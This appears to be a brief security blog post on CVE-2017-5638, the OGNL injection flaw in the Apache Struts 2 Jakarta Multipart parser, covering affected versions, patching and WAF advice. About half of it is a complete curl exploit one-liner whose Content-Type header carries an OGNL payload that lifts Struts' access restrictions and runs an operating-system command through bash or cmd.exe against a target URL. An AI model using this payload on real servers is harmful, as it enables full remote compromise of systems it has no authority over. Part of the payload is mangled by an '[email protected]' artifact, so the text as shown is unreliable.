Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when an invalid `Content-Type` header is sent with a file upload request. The parser incorrectly processes this header, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. Since OGNL expressions can execute Java code, a remote attacker can craft a malicious `Content-Type` header containing OGNL expressions. The Struts framework evaluates these expressions, leading to arbitrary code execution on the server with the privileges of the Struts application. This attack vector does not require the attacker to upload an actual file; the malicious payload is delivered entirely within the HTTP request header.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Craft malicious Content-Type header containing OGNL expressions for remote command execution on the vulnerable Struts server.
Protection from this CVE:
Apply official patch. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers.
Impact:
Full server compromise. Arbitrary system command execution. Complete application control.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

